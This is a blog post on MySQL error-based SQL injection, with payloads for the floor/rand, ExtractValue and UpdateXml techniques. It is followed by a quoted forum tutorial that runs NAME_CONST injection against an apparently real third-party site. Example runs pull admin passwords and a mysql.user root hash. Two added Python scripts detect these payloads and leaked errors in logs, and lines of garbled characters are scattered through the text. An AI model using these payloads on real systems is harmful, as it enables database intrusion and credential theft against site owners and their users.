
MySQL error-based injection: how the floor, ExtractValue and UpdateXml error modes are used

Posted on 2015-11-11 19:03:37

1. Triggering an error via floor

The following payloads can be used:

and (select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);

and (select count(*) from (select 1 union select null union select !1)x group by concat((select table_name from information_schema.tables limit 1),floor(rand(0)*2)));

Example:
First, run a normal query:

mysql> select * from article where id = 1;
+----+-------+---------+
| id | title | content |
+----+-------+---------+
|  1 | test  | do it   |
+----+-------+---------+

If the id parameter is injectable, the following statement triggers the error.

mysql> select * from article where id = 1 and (select 1 from  (select count(*),concat(version(),floor(rand(0)*2))x from  information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'

As you can see, the MySQL version is disclosed in the error message. To retrieve other data, replace the version() expression with the query you want. For example, to retrieve the administrator username and password:

Method1:

mysql> select * from article where id = 1 and (select 1 from (select count(*),concat((select pass from admin where id = 1),floor(rand(0)*2))x from information_schema.tables group by x)a);
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

Method2:

mysql> select * from article where id = 1 and (select count(*) from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),floor(rand(0)*2)));
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'

2. ExtractValue

Test statement:

and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

Actual test run:

mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,(select pass from admin limit 1)));
ERROR 1105 (HY000): XPATH syntax error: '\admin888'

3. UpdateXml

Test statement:

and 1=(updatexml(1,concat(0x3a,(select user())),1))

Actual test run:

mysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x3a,(select user())),1));
ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'
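As an added defensive example (not part of the original post), the following Python scans web-server access-log lines for the request-side signatures of the three error-based techniques above and of the NAME_CONST duplicate-column variant collected further down; the log lines, paths and IP addresses are constructed for the demonstration.

```python
import re
from urllib.parse import unquote_plus

# A technique is reported only when every fragment of its signature appears in the
# decoded query string, so a lone "concat(" or "group by" in normal traffic does not alert.
SIGNATURES = {
    "floor_rand_groupby": [r"count\(\s*\*\s*\)", r"group\s+by",
                           r"floor\(\s*rand\(\s*\d*\s*\)\s*\*\s*2\s*\)"],
    "extractvalue": [r"\bextractvalue\s*\(", r"\bconcat\s*\("],
    "updatexml": [r"\bupdatexml\s*\(", r"\bconcat\s*\("],
    "name_const_dup_column": [r"(?:\bname_const\s*\(.*){2}"],
}
COMPILED = {n: [re.compile(p) for p in pats] for n, pats in SIGNATURES.items()}
# Request target taken from an Apache/nginx combined-format access-log line.
REQUEST_RE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/\d\.\d"')

def normalise(raw):
    """Decode %xx and '+' once, drop /**/ comments, collapse whitespace, lower-case."""
    text = re.sub(r"/\*.*?\*/", " ", unquote_plus(raw))
    return re.sub(r"\s+", " ", text).lower()

def classify(target):
    """Names of the techniques whose complete signature appears in the query string."""
    query = normalise(target.split("?", 1)[1]) if "?" in target else ""
    return {n for n, pats in COMPILED.items() if all(rx.search(query) for rx in pats)}

def scan_access_log(lines):
    """(line_no, client_ip, [techniques]) for every request matching a signature."""
    hits = []
    for number, line in enumerate(lines, start=1):
        m = REQUEST_RE.search(line)
        found = classify(m.group(1)) if m else set()
        if found:
            hits.append((number, line.split()[0], sorted(found)))
    return hits

# Constructed sample access-log lines; the payloads are the ones shown on this page.
# Double-encoded payloads would need a second unquote pass before matching.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/Nov/2015:19:03:37 +0800] "GET /article.php?id=1 HTTP/1.1" 200 512',
    '10.0.0.9 - - [11/Nov/2015:19:04:02 +0800] "GET /article.php?id=1+and+(select+1+from+(select+count(*),concat(version(),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) HTTP/1.1" 500 221',
    '10.0.0.9 - - [11/Nov/2015:19:04:40 +0800] "GET /article.php?id=1%20and%20extractvalue(1,concat(0x5c,(select%20user()))) HTTP/1.1" 500 198',
    '10.0.0.9 - - [11/Nov/2015:19:05:11 +0800] "GET /article.php?id=1%20and%201=(updatexml(1,concat(0x3a,(select%20user())),1)) HTTP/1.1" 500 203',
    '10.0.0.9 - - [11/Nov/2015:19:06:00 +0800] "GET /detail.php?id=330+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)-- HTTP/1.1" 500 240',
]

if __name__ == "__main__":
    for hit in scan_access_log(SAMPLE_LOG):
        print(hit)
```

Pair this with a per-client threshold: a single run of these signatures followed by HTTP 500 responses is the pattern worth paging on.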



Further collected material:


http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const(@@version,0))a join (select name_const(@@version,0))b)c)

Error: Duplicate column name '5.0.27-community-nt'

http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261 and exists(select*from (select*from(select name_const((select concat(user,password) from mysql.user limit 0,1),0))a join (select name_const((select concat(user,password) from mysql.user limit 0,1),0))b)c)

Error: Duplicate column name 'root*B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'
, ~' q) E  ~6 H* g8 e7 s( M# l
Error-based injection trick for newer MySQL versions: injection using NAME_CONST

It's been a while since I've made an SQL Injection tutorial, so I thought I should make a new tutorial using the method name_const. There are not many papers documenting this method, so it feels kind of good to be the one to make a guide for it.

Related information

NAME_CONST was added in MySQL 5.0.12, so it won't work on anything less than that.

Code:
NAME_CONST(DATA, VALUE)

Returns the given value. When used to produce a result set column, NAME_CONST() causes the column to have the given name. The arguments should be constants.

SELECT NAME_CONST('TEST', 1)

+------+
| TEST |
+------+
|    1 |
+------+

http://dev.mysql.com/doc/refman/5.0/en/m...name-const
Intro to MySQL Variables

Once you've got your vulnerable site, let's try getting some MySQL system variables using NAME_CONST.

Code:
http://www.baido.hk/qcwh/content ... ;sid=19&cid=261

Code:
and+1=(select+*+from+(select+NAME_CONST(VAR,1),NAME_CONST(VAR,1))+as+x)--

VAR = Your MySQL variable.

MySQL 5.1.3 Server System Variables

Let's try it out on my site..

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--

Error: Duplicate column name '5.0.27-community-nt'
; x" Z  B$ w# y, W. ^- g) ~
Now I've tried a couple of sites, and I was getting invalid calls to NAME_CONST trying to extract data. Nothing was wrong with my syntax, it just wouldn't work there. Luckily, they work here so let's get this going again...

Data Extraction

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+DATA+limit+0,1),1),NAME_CONST((select+DATA+limit+0,1),1))+as+x)--

We should get a duplicate column 1 error...

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+1+limit+0,1),1),NAME_CONST((select+1+limit+0,1),1))+as+x)--

Error: Duplicate column name '1'

Now let's get the tables out of this bitch..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Let's see if it works here; if it does, we can go on and finish the job.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1),NAME_CONST((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1))+as+x)--

Error: Duplicate column name 'com_admanage'
1 i0 n2 K" o0 J  l" l9 @% }
Now I'm going to be lazy and use mysql.user as an example, just for the sake of time.

Let's get the columns out of the user table..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_name=0xHEX_OF_TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this, and I get the duplicate column name 'Host'.

Code:
http://www.baido.hk/qcwh/content ... &cid=261+and+1=(select+*+from+(select+NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1),NAME_CONST((select+column_name+from+information_schema.columns+where+table_schema=0x6d7973716c+and+table_name=0x75736572+limit+0,1),1))+as+x)--

Error: Duplicate column name 'Host'

Woot, time to finish this bitch off..

Code:
+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,COLUMN1,COLUMN2)+from+TABLENAME+limit+0,1),1))+as+x)--

So mine looks like this...

Code:
http://www.baido.hk/qcwh/content/detail.php?id=330&sid=19&cid=261+and+1=(select+*+from+(select+NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1),NAME_CONST((select+concat_ws(0x207e20,User,Password)+from+mysql.user+limit+0,1),1))+as+x)--

Error: Duplicate column name 'root ~ *B7B1A4F45D9E638FAEB750F0A99935634CFF6C82'

And there we have it, thanks for reading.
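As an added defensive example (not part of the original post or of the quoted NAME_CONST tutorial), this Python pulls the disclosed values out of the three MySQL error texts that appear throughout this post, as they would land in an application error log, and shows the generic message an application should return instead of the raw database error; the log lines are constructed and the password hash is a placeholder.

```python
import re

# Error texts the techniques on this page produce: the floor/rand duplicate key, the
# ExtractValue/UpdateXml XPath error (both functions give the same message) and the
# NAME_CONST duplicate column. Each pattern captures the fragment of query output echoed back.
LEAK_PATTERNS = {
    "floor_rand_groupby": re.compile(
        r"Duplicate entry '(?P<leak>[^']*)' for key '<?group_key>?'"),
    "xpath_function": re.compile(r"XPATH syntax error: '(?P<leak>[^']*)'"),
    "name_const": re.compile(r"Duplicate column name '(?P<leak>[^']*)'"),
}

def strip_marker(technique, leak):
    """Drop the marker bytes the payload itself added, leaving the disclosed value."""
    if technique == "floor_rand_groupby" and leak and leak[-1] in "01":
        return leak[:-1]           # trailing 0/1 is the floor(rand(0)*2) output
    if technique == "xpath_function":
        return leak.lstrip("\\:~")  # 0x5c / 0x3a separator prepended by concat()
    return leak

def find_leaks(lines):
    """(line_no, technique, disclosed_value) for every error line that leaks data."""
    findings = []
    for number, line in enumerate(lines, start=1):
        for technique, rx in LEAK_PATTERNS.items():
            m = rx.search(line)
            if m:
                findings.append((number, technique, strip_marker(technique, m.group("leak"))))
                break
    return findings

def sanitize_db_error(db_message):
    """Generic text for the HTTP response plus an alert flag. The raw message belongs
    in the server-side log only; echoing it to the client is what these techniques rely on."""
    leaking = any(rx.search(db_message) for rx in LEAK_PATTERNS.values())
    return "An internal error occurred.", leaking

# Constructed application error-log lines modelled on the errors shown on this page
# (the password hash is a placeholder, not a real value).
SAMPLE_ERRORS = [
    "2015-11-11 19:04:02 article.php id=1 ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key'",
    "2015-11-11 19:04:40 article.php id=1 ERROR 1105 (HY000): XPATH syntax error: '\\admin888'",
    "2015-11-11 19:05:11 article.php id=1 ERROR 1105 (HY000): XPATH syntax error: ':root@localhost'",
    "2015-11-11 19:06:00 detail.php id=330 Error: Duplicate column name 'root ~ *HASH_PLACEHOLDER'",
    "2015-11-11 19:07:00 article.php id=2 ERROR 1146 (42S02): Table 'blog.comments' doesn't exist",
]

if __name__ == "__main__":
    for finding in find_leaks(SAMPLE_ERRORS):
        print(finding)
```

Note that the recovered floor/rand value is the real version string with the attacker's trailing digit removed, which is the detail an incident responder needs to judge what was actually disclosed.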
